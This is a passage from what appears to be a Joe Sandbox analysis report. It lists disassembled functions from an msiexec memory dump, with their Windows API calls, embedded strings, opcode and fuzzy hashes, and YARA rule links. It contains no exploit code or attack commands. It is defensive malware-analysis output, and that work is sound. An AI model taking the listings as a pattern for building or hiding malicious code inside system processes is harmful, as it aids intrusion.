                                                                                                                                                                                                          • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                          Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$CloseHandle
                                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                                          • API String ID: 3722638380-26480598
                                                                                                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                          • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                          Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                          • Opcode ID: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                          Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                          • Opcode ID: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
